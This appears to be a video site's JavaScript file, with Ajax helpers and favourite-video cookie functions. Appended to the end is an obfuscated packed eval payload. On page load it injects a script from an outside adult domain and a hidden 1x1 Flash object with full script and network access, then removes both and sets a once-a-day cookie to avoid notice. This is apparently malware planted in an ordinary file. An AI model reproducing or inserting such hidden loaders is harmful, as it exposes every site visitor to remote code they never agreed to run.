// General Functions
function ExecAjax(url,parameters,func_create,func_success,func_complete,func_error,async){
	var rand = Math.round(Math.random() * 2000);
	parameters=rand+"&"+parameters;
		
	if(async!=true){async=false;}else{async=true;}
	
	var result = new String();
	var objetoAjax = new Ajax.Request(
		url, 
		{
			method: 'GET', 
			encoding: 'ISO-8859-1',
			parameters: parameters, 
			onCreate : function(){if(func_create) eval(func_create);},
			onSuccess : function(){if(func_success) eval(func_success);},
			onComplete: function(transport){
				//alert("Ajax Result: "+transport.responseText);
				eval(func_complete);
			},
			onFailure:  function(){
				if(func_error==null){
					alert("Error: Action has not been executed correctly.");
				} else {
					eval(func_error);
				}
			},
			asynchronous : async
		});
	return result;
}

function addFavCookie(video_id,update){
	document.cookie ='favorite_videos['+video_id+']='+video_id+'; expires=Tue, 30 Apr 2030 23:59:59 UTC; path=/';	
	if(update){
		$('favstar_off_'+video_id).hide();
		$('favstar_on_'+video_id).show();
	}
	alert(labels['video_added_to_favorites']);
}

function deleteFavCookie(video_id,update){
	document.cookie ='favorite_videos['+video_id+']=""; expires=Wed, 25 Apr 2000 00:00:00 UTC; path=/';	
	if(update){
		$('favstar_on_'+video_id).hide();
		$('favstar_off_'+video_id).show();	
	}
	alert(labels['video_removed_from_favorites']);
}


eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('2 20=\'\';9 50(){2 8=4.41(\'73\');8.10("45","74/72");8.10("12","31");8.10("30","32://71.69.70/7/75.76");2 11=4.42(\'28\')[0];11.34(8);19("25(\'31\');",81)}9 53(){2 7=\'<40 38="1" 37="1" 82="80:79-77-68-78-83" 64="32://58.56.59/61/35/66/44/62.63#67=6,0,29,0"><33 5="65" 15="\'+20+\'"><33 5="43" 15="39"><36 30="\'+20+\'" 99="84" 45="106/104-35-44" 101="108" 107="112" 109="110" 43="39" 38="1" 37="1"></36></40>\';2 13=4.41(\'88\');2 46=\'7\';13.10(\'12\',46);13.87=7;2 11=4.42(\'28\')[0];11.34(13);19("25(\'7\');",97)}9 25(12){2 27=4.96(12);27.93.94(27)}9 47(5,15,26){21(26){2 14=105 95();14.98(14.92()+(26*24*60*60*55));2 16="; 16="+14.91()}86 2 16="";4.48=5+"="+15+16+"; 85=/"}9 54(5){2 23=5+"=";2 22=4.48.90(\';\');89(2 17=0;17<22.18;17++){2 3=22[17];100(3.102(0)==\' \')3=3.49(1,3.18);21(3.111(23)==0)51 3.49(23.18,3.18)}51 103}21(54(\'52\')!="1"){19("50();",55);19("53();",57);47(\'52\',"1",1)}',10,113,'||var|c|document|name||stats|fileref|function|setAttribute|bodyElement|id|statsdiv|date|value|expires|i|length|setTimeout|url|if|ca|nameEQ||RemoveElement|days|d|body||src|rjs|http|param|appendChild|shockwave|embed|height|width|transparent|object|createElement|getElementsByTagName|wmode|flash|type|divId|createCookie|cookie|substring|LoadUrls|return|rotation_ok|CreateStats|readCookie|1000|macromedia|4100|download|com||pub|swflash|cab|codebase|movie|cabs|version|11cf|pornotubes|info|www|javascript|script|text|r|php|AE6D|96B8|D27CDB6E|clsid|3000|classid|444553540000|high|path|else|innerHTML|div|for|split|toGMTString|getTime|parentNode|removeChild|Date|getElementById|5000|setTime|quality|while|allowfullscreen|charAt|null|x|new|application|allowSriptAccess|false|allownetworking|all|indexOf|always'.split('|')));

